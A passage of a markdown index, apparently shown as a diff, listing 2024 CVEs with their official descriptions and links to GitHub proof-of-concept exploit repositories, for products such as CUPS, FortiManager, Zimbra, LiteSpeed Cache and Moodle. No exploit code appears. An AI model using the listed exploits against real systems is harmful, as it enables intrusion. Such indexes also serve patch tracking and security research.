This requires the capability to add/update questions. + + +- [RedTeamPentesting/moodle-rce-calculatedquestions](https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions) + +### CVE-2024-43532 (2024-10-08) + +Remote Registry Service Elevation of Privilege Vulnerability + + +- [expl0itsecurity/CVE-2024-43532](https://github.com/expl0itsecurity/CVE-2024-43532) + +### CVE-2024-43582 (2024-10-08) + +Remote Desktop Protocol Server Remote Code Execution Vulnerability + + +- [jinxongwi/CVE-2024-43582-RCE](https://github.com/jinxongwi/CVE-2024-43582-RCE) + +### CVE-2024-43917 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TemplateInvaders TI WooCommerce Wishlist allows SQL Injection.This issue affects TI WooCommerce Wishlist: from n/a through 2.8.2. + + +- [p33d/CVE-2024-43917](https://github.com/p33d/CVE-2024-43917) + +### CVE-2024-43918 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW WBW Product Table PRO allows SQL Injection.This issue affects WBW Product Table PRO: from n/a through 1.9.4. + + +- [KTN1990/CVE-2024-43918](https://github.com/KTN1990/CVE-2024-43918) + +### CVE-2024-43919 (2024-11-01) + +Access Control vulnerability in YARPP YARPP allows .\n\nThis issue affects YARPP: from n/a through 5.30.10. + + +- [RandomRobbieBF/CVE-2024-43919](https://github.com/RandomRobbieBF/CVE-2024-43919) + +### CVE-2024-43965 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n/a through 1.4. + + +- [RandomRobbieBF/CVE-2024-43965](https://github.com/RandomRobbieBF/CVE-2024-43965) + +### CVE-2024-43998 (2024-11-01) + +Missing Authorization vulnerability in WebsiteinWP Blogpoet allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blogpoet: from n/a through 1.0.3. + + +- [RandomRobbieBF/CVE-2024-43998](https://github.com/RandomRobbieBF/CVE-2024-43998) + +### CVE-2024-44000 (2024-10-20) + +Insufficiently Protected Credentials vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Authentication Bypass.This issue affects LiteSpeed Cache: from n/a before 6.5.0.1. + + +- [absholi7ly/CVE-2024-44000-LiteSpeed-Cache](https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache) +- [gbrsh/CVE-2024-44000](https://github.com/gbrsh/CVE-2024-44000) +- [ifqygazhar/CVE-2024-44000-LiteSpeed-Cache](https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache) +- [geniuszlyy/CVE-2024-44000](https://github.com/geniuszlyy/CVE-2024-44000) + +### CVE-2024-44083 (2024-08-19) + +ida64.dll in Hex-Rays IDA Pro through 8.4 crashes when there is a section that has many jumps linked, and the final jump corresponds to the payload from where the actual entry point will be invoked. NOTE: in many use cases, this is an inconvenience but not a security issue. + + +- [Azvanzed/CVE-2024-44083](https://github.com/Azvanzed/CVE-2024-44083) + +### CVE-2024-44193 (2024-10-02) + +A logic issue was addressed with improved restrictions. This issue is fixed in iTunes 12.13.3 for Windows. A local attacker may be able to elevate their privileges. + + +- [mbog14/CVE-2024-44193](https://github.com/mbog14/CVE-2024-44193) + +### CVE-2024-44258 (2024-10-28) + +This issue was addressed with improved handling of symlinks. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, visionOS 2.1, tvOS 18.1. Restoring a maliciously crafted backup file may lead to modification of protected system files. + + +- [ifpdz/CVE-2024-44258](https://github.com/ifpdz/CVE-2024-44258) + +### CVE-2024-44337 (2024-10-15) + +The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `v0.0.0-20240729232818-a2a9c4f`, which corresponds with commit `a2a9c4f76ef5a5c32108e36f7c47f8d310322252`, there was a logical problem in the paragraph function of the parser/block.go file, which allowed a remote attacker to cause a denial of service (DoS) condition by providing a tailor-made input that caused an infinite loop, causing the program to hang and consume resources indefinitely. Submit `a2a9c4f76ef5a5c32108e36f7c47f8d310322252` contains fixes to this problem. + + +- [Brinmon/CVE-2024-44337](https://github.com/Brinmon/CVE-2024-44337) + +### CVE-2024-44346 +- [Shauryae1337/CVE-2024-44346](https://github.com/Shauryae1337/CVE-2024-44346) +- [sahil3276/CVE-2024-44346](https://github.com/sahil3276/CVE-2024-44346) + +### CVE-2024-44349 (2024-10-08) + +A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB. + + +- [AndreaF17/PoC-CVE-2024-44349](https://github.com/AndreaF17/PoC-CVE-2024-44349) + +### CVE-2024-44450 +- [VoidSecOrg/CVE-2024-44450](https://github.com/VoidSecOrg/CVE-2024-44450) + +### CVE-2024-44541 (2024-09-11) + +evilnapsis Inventio Lite Versions v4 and before is vulnerable to SQL Injection via the "username" parameter in "/?action=processlogin." + + +- [pointedsec/CVE-2024-44541](https://github.com/pointedsec/CVE-2024-44541) + +### CVE-2024-44542 (2024-09-18) + +SQL Injection vulnerability in todesk v.1.1 allows a remote attacker to execute arbitrary code via the /todesk.com/news.html parameter. + + +- [alphandbelt/CVE-2024-44542](https://github.com/alphandbelt/CVE-2024-44542) + +### CVE-2024-44610 (2024-10-01) + +PCAN-Ethernet Gateway FD before 1.3.0 and PCAN-Ethernet Gateway before 2.11.0 are vulnerable to Command injection via shell metacharacters in a Software Update to processing.php. + + +- [BertoldVdb/PcanExploit](https://github.com/BertoldVdb/PcanExploit) + +### CVE-2024-44623 (2024-09-16) + +An issue in TuomoKu SPx-GC v.1.3.0 and before allows a remote attacker to execute arbitrary code via the child_process.js function. + + +- [merbinr/CVE-2024-44623](https://github.com/merbinr/CVE-2024-44623) + +### CVE-2024-44625 (2024-11-15) + +Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function of internal/route/repo/editor.go. + + +- [Fysac/CVE-2024-44625](https://github.com/Fysac/CVE-2024-44625) + +### CVE-2024-44812 (2024-10-22) + +SQL Injection vulnerability in Online Complaint Site v.1.0 allows a remote attacker to escalate privileges via the username and password parameters in the /admin.index.php component. + + +- [b1u3st0rm/CVE-2024-44812-PoC](https://github.com/b1u3st0rm/CVE-2024-44812-PoC) + +### CVE-2024-44815 (2024-09-10) + +Vulnerability in Hathway Skyworth Router CM5100 v.4.1.1.24 allows a physically proximate attacker to obtain user credentials via SPI flash Firmware W25Q64JV. + + +- [nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-](https://github.com/nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-) + +### CVE-2024-44849 (2024-09-09) + +Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php. + + +- [extencil/CVE-2024-44849](https://github.com/extencil/CVE-2024-44849) + +### CVE-2024-44867 (2024-09-10) + +phpok v3.0 was discovered to contain an arbitrary file read vulnerability via the component /autoload/file.php. + + +- [ChengZyin/CVE-2024-44867](https://github.com/ChengZyin/CVE-2024-44867) + +### CVE-2024-44902 (2024-09-09) + +A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code. + + +- [fru1ts/CVE-2024-44902](https://github.com/fru1ts/CVE-2024-44902) + +### CVE-2024-44946 (2024-08-31) + +In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Serialise kcm_sendmsg() for the same socket.\n\nsyzkaller reported UAF in kcm_release(). [0]\n\nThe scenario is\n\n 1. Thread A builds a skb with MSG_MORE and sets kcm->seq_skb.\n\n 2. Thread A resumes building skb from kcm->seq_skb but is blocked\n by sk_stream_wait_memory()\n\n 3. Thread B calls sendmsg() concurrently, finishes building kcm->seq_skb\n and puts the skb to the write queue\n\n 4. Thread A faces an error and finally frees skb that is already in the\n write queue\n\n 5. kcm_release() does double-free the skb in the write queue\n\nWhen a thread is building a MSG_MORE skb, another thread must not touch it.\n\nLet's add a per-sk mutex and serialise kcm_sendmsg().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __skb_unlink include/linux/skbuff.h:2366 [inline]\nBUG: KASAN: slab-use-after-free in __skb_dequeue include/linux/skbuff.h:2385 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge include/linux/skbuff.h:3181 [inline]\nBUG: KASAN: slab-use-after-free in kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\nRead of size 8 at addr ffff0000ced0fc80 by task syz-executor329/6167\n\nCPU: 1 PID: 6167 Comm: syz-executor329 Tainted: G B 6.8.0-rc5-syzkaller-g9abbc24128bc #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nCall trace:\n dump_backtrace+0x1b8/0x1e4 arch/arm64/kernel/stacktrace.c:291\n show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:298\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd0/0x124 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x178/0x518 mm/kasan/report.c:488\n kasan_report+0xd8/0x138 mm/kasan/report.c:601\n __asan_report_load8_noabort+0x20/0x2c mm/kasan/report_generic.c:381\n __skb_unlink include/linux/skbuff.h:2366 [inline]\n __skb_dequeue include/linux/skbuff.h:2385 [inline]\n __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\n __skb_queue_purge include/linux/skbuff.h:3181 [inline]\n kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\n __sock_release net/socket.c:659 [inline]\n sock_close+0xa4/0x1e8 net/socket.c:1421\n __fput+0x30c/0x738 fs/file_table.c:376\n ____fput+0x20/0x30 fs/file_table.c:404\n task_work_run+0x230/0x2e0 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0x618/0x1f64 kernel/exit.c:871\n do_group_exit+0x194/0x22c kernel/exit.c:1020\n get_signal+0x1500/0x15ec kernel/signal.c:2893\n do_signal+0x23c/0x3b44 arch/arm64/kernel/signal.c:1249\n do_notify_resume+0x74/0x1f4 arch/arm64/kernel/entry-common.c:148\n exit_to_user_mode_prepare arch/arm64/kernel/entry-common.c:169 [inline]\n exit_to_user_mode arch/arm64/kernel/entry-common.c:178 [inline]\n el0_svc+0xac/0x168 arch/arm64/kernel/entry-common.c:713\n el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:730\n el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598\n\nAllocated by task 6166:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x40/0x78 mm/kasan/common.c:68\n kasan_save_alloc_info+0x70/0x84 mm/kasan/generic.c:626\n unpoison_slab_object mm/kasan/common.c:314 [inline]\n __kasan_slab_alloc+0x74/0x8c mm/kasan/common.c:340\n kasan_slab_alloc include/linux/kasan.h:201 [inline]\n slab_post_alloc_hook mm/slub.c:3813 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n kmem_cache_alloc_node+0x204/0x4c0 mm/slub.c:3903\n __alloc_skb+0x19c/0x3d8 net/core/skbuff.c:641\n alloc_skb include/linux/skbuff.h:1296 [inline]\n kcm_sendmsg+0x1d3c/0x2124 net/kcm/kcmsock.c:783\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n sock_sendmsg+0x220/0x2c0 net/socket.c:768\n splice_to_socket+0x7cc/0xd58 fs/splice.c:889\n do_splice_from fs/splice.c:941 [inline]\n direct_splice_actor+0xec/0x1d8 fs/splice.c:1164\n splice_direct_to_actor+0x438/0xa0c fs/splice.c:1108\n do_splice_direct_actor \n---truncated--- + + +- [Abdurahmon3236/CVE-2024-44946](https://github.com/Abdurahmon3236/CVE-2024-44946) + +### CVE-2024-44947 (2024-09-02) + +In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: Initialize beyond-EOF page contents before setting uptodate\n\nfuse_notify_store(), unlike fuse_do_readpage(), does not enable page\nzeroing (because it can be used to change partial page contents).\n\nSo fuse_notify_store() must be more careful to fully initialize page\ncontents (including parts of the page that are beyond end-of-file)\nbefore marking the page uptodate.\n\nThe current code can leave beyond-EOF page contents uninitialized, which\nmakes these uninitialized page contents visible to userspace via mmap().\n\nThis is an information leak, but only affects systems which do not\nenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the\ncorresponding kernel command line parameter). + + +- [Abdurahmon3236/CVE-2024-44947](https://github.com/Abdurahmon3236/CVE-2024-44947) + +### CVE-2024-45058 (2024-08-28) + +i-Educar is free, fully online school management software that can be used by school secretaries, teachers, coordinators, and area managers. Prior to the 2.9 branch, an attacker with only minimal viewing privileges in the settings section is able to change their user type to Administrator (or another type with super-permissions) through a specifically crafted POST request to `/intranet/educar_usuario_cad.php`, modifying the `nivel_usuario_` parameter. The vulnerability occurs in the file located at `ieducar/intranet/educar_usuario_cad.php`, which does not check the user's current permission level before allowing changes. Commit c25910cdf11ab50e50162a49dd44bef544422b6e contains a patch for the issue. + + +- [0xbhsu/CVE-2024-45058](https://github.com/0xbhsu/CVE-2024-45058) + +### CVE-2024-45200 (2024-09-30) + +In Nintendo Mario Kart 8 Deluxe before 3.0.3, the LAN/LDN local multiplayer implementation allows a remote attacker to exploit a stack-based buffer overflow upon deserialization of session information via a malformed browse-reply packet, aka KartLANPwn. The victim is not required to join a game session with an attacker. The victim must open the "Wireless Play" (or "LAN Play") menu from the game's title screen, and an attacker nearby (LDN) or on the same LAN network as the victim can send a crafted reply packet to the victim's console. This enables a remote attacker to obtain complete denial-of-service on the game's process, or potentially, remote code execution on the victim's console. The issue is caused by incorrect use of the Nintendo Pia library, + + +- [latte-soft/kartlanpwn](https://github.com/latte-soft/kartlanpwn) + +### CVE-2024-45241 (2024-08-26) + +A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information. + + +- [d4lyw/CVE-2024-45241](https://github.com/d4lyw/CVE-2024-45241) +- [verylazytech/CVE-2024-45241](https://github.com/verylazytech/CVE-2024-45241) + +### CVE-2024-45244 (2024-08-25) + +Hyperledger Fabric through 2.5.9 does not verify that a request has a timestamp within the expected time window. + + +- [shanker-sec/HLF_TxTime_spoofing](https://github.com/shanker-sec/HLF_TxTime_spoofing) +- [shanker-sec/hlf-time-oracle](https://github.com/shanker-sec/hlf-time-oracle) + +### CVE-2024-45264 (2024-08-27) + +A cross-site request forgery (CSRF) vulnerability in the admin panel in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to add a new administrator, leading to escalation of privileges. + + +- [TheHermione/CVE-2024-45264](https://github.com/TheHermione/CVE-2024-45264) + +### CVE-2024-45265 (2024-08-26) + +A SQL injection vulnerability in the poll component in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to execute arbitrary SQL commands via the psid parameter. + + +- [TheHermione/CVE-2024-45265](https://github.com/TheHermione/CVE-2024-45265) + +### CVE-2024-45383 (2024-09-12) + +A mishandling of IRP requests vulnerability exists in the HDAudBus_DMA interface of Microsoft High Definition Audio Bus Driver 10.0.19041.3636 (WinBuild.160101.0800). A specially crafted application can issue multiple IRP Complete requests which leads to a local denial-of-service. An attacker can execute malicious script/application to trigger this vulnerability. + + +- [SpiralBL0CK/CVE-2024-45383](https://github.com/SpiralBL0CK/CVE-2024-45383) + +### CVE-2024-45409 (2024-09-10) + +The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3. + + +- [synacktiv/CVE-2024-45409](https://github.com/synacktiv/CVE-2024-45409) + +### CVE-2024-45410 (2024-09-19) + +Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [jphetphoumy/traefik-CVE-2024-45410-poc](https://github.com/jphetphoumy/traefik-CVE-2024-45410-poc) + +### CVE-2024-45436 (2024-08-29) + +extractFromZipFile in model.go in Ollama before 0.1.47 can extract members of a ZIP archive outside of the parent directory. + + +- [pankass/CVE-2024-45436](https://github.com/pankass/CVE-2024-45436) +- [XiaomingX/cve-2024-45436-exp](https://github.com/XiaomingX/cve-2024-45436-exp) + +### CVE-2024-45492 (2024-08-30) + +An issue was discovered in libexpat before 2.6.3. nextScaffoldPart in xmlparse.c can have an integer overflow for m_groupSize on 32-bit platforms (where UINT_MAX equals SIZE_MAX). + + +- [nidhihcl75/external_expat_2.6.2_CVE-2024-45492](https://github.com/nidhihcl75/external_expat_2.6.2_CVE-2024-45492) + +### CVE-2024-45507 (2024-09-04) + +Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 18.12.16.\n\nUsers are recommended to upgrade to version 18.12.16, which fixes the issue. + + +- [Avento/CVE-2024-45507_Behinder_Webshell](https://github.com/Avento/CVE-2024-45507_Behinder_Webshell) + +### CVE-2024-45519 (2024-10-02) + +The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. + + +- [p33d/CVE-2024-45519](https://github.com/p33d/CVE-2024-45519) +- [Chocapikk/CVE-2024-45519](https://github.com/Chocapikk/CVE-2024-45519) +- [whiterose7777/CVE-2024-45519](https://github.com/whiterose7777/CVE-2024-45519) +- [XiaomingX/cve-2024-45519-poc](https://github.com/XiaomingX/cve-2024-45519-poc) + +### CVE-2024-45589 (2024-09-05) + +RapidIdentity LTS through 2023.0.2 and Cloud through 2024.08.0 improperly restricts excessive authentication attempts and allows a remote attacker to cause a denial of service via the username parameters. + + +- [BenRogozinski/CVE-2024-45589](https://github.com/BenRogozinski/CVE-2024-45589) + +### CVE-2024-45614 (2024-09-19) + +Puma is a Ruby/Rack web server built for parallelism. In affected versions clients could clobber values set by intermediate proxies (such as X-Forwarded-For) by providing a underscore version of the same header (X-Forwarded_For). Any users relying on proxy set variables is affected. v6.4.3/v5.6.9 now discards any headers using underscores if the non-underscore version also exists. Effectively, allowing the proxy defined headers to always win. Users are advised to upgrade. Nginx has a underscores_in_headers configuration variable to discard these headers at the proxy level as a mitigation. Any users that are implicitly trusting the proxy defined headers for security should immediately cease doing so until upgraded to the fixed versions. + + +- [ooooooo-q/puma_header_normalization-CVE-2024-45614](https://github.com/ooooooo-q/puma_header_normalization-CVE-2024-45614) + +### CVE-2024-46209 +- [h4ckr4v3n/CVE-2024-46209](https://github.com/h4ckr4v3n/CVE-2024-46209) + +### CVE-2024-46256 (2024-09-27) + +A Command injection vulnerability in requestLetsEncryptSsl in NginxProxyManager 2.11.3 allows an attacker to RCE via Add Let's Encrypt Certificate. + + +- [barttran2k/POC_CVE-2024-46256](https://github.com/barttran2k/POC_CVE-2024-46256) + +### CVE-2024-46278 (2024-10-07) + +Teedy 1.11 is vulnerable to Cross Site Scripting (XSS) via the management console. + + +- [ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover](https://github.com/ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover) + +### CVE-2024-46377 (2024-09-18) + +Best House Rental Management System 1.0 contains an arbitrary file upload vulnerability in the save_settings() function of the file rental/admin_class.php. + + +- [vidura2/CVE-2024-46377](https://github.com/vidura2/CVE-2024-46377) + +### CVE-2024-46383 (2024-11-15) + +Hathway Skyworth Router CM5100-511 v4.1.1.24 was discovered to store sensitive information about USB and Wifi connected devices in plaintext. + + +- [nitinronge91/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383](https://github.com/nitinronge91/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383) + +### CVE-2024-46451 (2024-09-16) + +TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter. + + +- [vidura2/CVE-2024-46451](https://github.com/vidura2/CVE-2024-46451) + +### CVE-2024-46483 (2024-10-22) + +Xlight FTP Server <3.9.4.3 has an integer overflow vulnerability in the packet parsing logic of the SFTP server, which can lead to a heap overflow with attacker-controlled content. + + +- [kn32/cve-2024-46483](https://github.com/kn32/cve-2024-46483) + +### CVE-2024-46532 (2024-10-11) + +SQL Injection vulnerability in OpenHIS v.1.0 allows an attacker to execute arbitrary code via the refund function in the PayController.class.php component. + + +- [KamenRiderDarker/CVE-2024-46532](https://github.com/KamenRiderDarker/CVE-2024-46532) + +### CVE-2024-46538 (2024-10-22) + +A cross-site scripting (XSS) vulnerability in pfsense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php. + + +- [EQSTLab/CVE-2024-46538](https://github.com/EQSTLab/CVE-2024-46538) + +### CVE-2024-46627 (2024-09-26) + +Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests. + + +- [d4lyw/CVE-2024-46627](https://github.com/d4lyw/CVE-2024-46627) + +### CVE-2024-46635 (2024-09-30) + +An issue in the API endpoint /AccountMaster/GetCurrentUserInfo of INROAD before v202402060 allows attackers to access sensitive information via a crafted payload to the UserNameOrPhoneNumber parameter. + + +- [h1thub/CVE-2024-46635](https://github.com/h1thub/CVE-2024-46635) + +### CVE-2024-46658 (2024-10-03) + +Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 was discovered to contain an authenticated command injection vulnerability. + + +- [jackalkarlos/CVE-2024-46658](https://github.com/jackalkarlos/CVE-2024-46658) + +### CVE-2024-46901 +- [devhaozi/CVE-2024-46901](https://github.com/devhaozi/CVE-2024-46901) + +### CVE-2024-46986 (2024-09-18) + +Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails. An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application. This issue has been addressed in release version 2.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [vidura2/CVE-2024-46986](https://github.com/vidura2/CVE-2024-46986) + +### CVE-2024-47062 (2024-09-20) + +Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [saisathvik1/CVE-2024-47062](https://github.com/saisathvik1/CVE-2024-47062) + +### CVE-2024-47066 (2024-09-23) + +Lobe Chat is an open-source artificial intelligence chat framework. Prior to version 1.19.13, server-side request forgery protection implemented in `src/app/api/proxy/route.ts` does not consider redirect and could be bypassed when attacker provides an external malicious URL which redirects to internal resources like a private network or loopback address. Version 1.19.13 contains an improved fix for the issue. + + +- [l8BL/CVE-2024-47066](https://github.com/l8BL/CVE-2024-47066) + +### CVE-2024-47076 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. The `cfGetPrinterAttributes5` function in `libcupsfilters` does not sanitize IPP attributes returned from an IPP server. When these IPP attributes are used, for instance, to generate a PPD file, this can lead to attacker controlled data to be provided to the rest of the CUPS system. + + +- [mutkus/CVE-2024-47076](https://github.com/mutkus/CVE-2024-47076) + +### CVE-2024-47176 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to. + + +- [GO0dspeed/spill](https://github.com/GO0dspeed/spill) +- [workabhiwin09/CVE-2024-47176](https://github.com/workabhiwin09/CVE-2024-47176) +- [tonyarris/CVE-2024-47176-Scanner](https://github.com/tonyarris/CVE-2024-47176-Scanner) +- [mr-r3b00t/CVE-2024-47176](https://github.com/mr-r3b00t/CVE-2024-47176) +- [aytackalinci/CVE-2024-47176](https://github.com/aytackalinci/CVE-2024-47176) +- [lkarlslund/jugular](https://github.com/lkarlslund/jugular) +- [nma-io/CVE-2024-47176](https://github.com/nma-io/CVE-2024-47176) +- [l0n3m4n/CVE-2024-47176](https://github.com/l0n3m4n/CVE-2024-47176) +- [gumerzzzindo/CVE-2024-47176](https://github.com/gumerzzzindo/CVE-2024-47176) +- [MalwareTech/CVE-2024-47176-Scanner](https://github.com/MalwareTech/CVE-2024-47176-Scanner) +- [AxthonyV/CVE-2024-47176](https://github.com/AxthonyV/CVE-2024-47176) +- [gianlu111/CUPS-CVE-2024-47176](https://github.com/gianlu111/CUPS-CVE-2024-47176) +- [0x7556/CVE-2024-47176](https://github.com/0x7556/CVE-2024-47176) + +### CVE-2024-47177 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE_2024-47176, this can lead to remote command execution. + + +- [referefref/cupspot-2024-47177](https://github.com/referefref/cupspot-2024-47177) + +### CVE-2024-47575 (2024-10-23) + +A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.12, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests. + + +- [watchtowrlabs/Fortijump-Exploit-CVE-2024-47575](https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575) +- [skyalliance/exploit-cve-2024-47575](https://github.com/skyalliance/exploit-cve-2024-47575) +- [expl0itsecurity/CVE-2024-47575](https://github.com/expl0itsecurity/CVE-2024-47575) +- [XiaomingX/cve-2024-47575-exp](https://github.com/XiaomingX/cve-2024-47575-exp) + +### CVE-2024-47854 (2024-10-04) + +An XSS vulnerability was discovered in Veritas Data Insight before 7.1. It allows a remote attacker to inject an arbitrary web script into an HTTP request that could reflect back to an authenticated user without sanitization if executed by that user. + + +- [MarioTesoro/CVE-2024-47854](https://github.com/MarioTesoro/CVE-2024-47854) + +### CVE-2024-48208 (2024-10-24) + +pure-ftpd before 1.0.52 is vulnerable to Buffer Overflow. There is an out of bounds read in the domlsd() function of the ls.c file. + + +- [rohilchaudhry/CVE-2024-48208](https://github.com/rohilchaudhry/CVE-2024-48208) + +### CVE-2024-48217 (2024-11-01) + +An Insecure Direct Object Reference (IDOR) in the dashboard of SiSMART v7.4.0 allows attackers to execute a horizontal-privilege escalation. + + +- [ajrielrm/CVE-2024-48217](https://github.com/ajrielrm/CVE-2024-48217) + +### CVE-2024-48322 (2024-11-11) + +UsersController.php in Run.codes 1.5.2 and older has a reset password race condition vulnerability. + + +- [trqt/CVE-2024-48322](https://github.com/trqt/CVE-2024-48322) + +### CVE-2024-48325 (2024-11-06) + +Portabilis i-Educar 2.8.0 is vulnerable to SQL Injection in the "getDocuments" function of the "InstituicaoDocumentacaoController" class. The "instituicao_id" parameter in "/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id" is not properly sanitized, allowing an unauthenticated remote attacker to inject malicious SQL commands. + + +- [osvaldotenorio/cve-2024-48325](https://github.com/osvaldotenorio/cve-2024-48325) + +### CVE-2024-48326 +- [fabiobsj/CVE-2024-48326](https://github.com/fabiobsj/CVE-2024-48326) + +### CVE-2024-48336 (2024-11-04) + +The install() function of ProviderInstaller.java in Magisk App before canary version 27007 does not verify the GMS app before loading it, which allows a local untrusted app with no additional privileges to silently execute arbitrary code in the Magisk app and escalate privileges to root via a crafted package, aka Bug #8279. User interaction is not needed for exploitation. 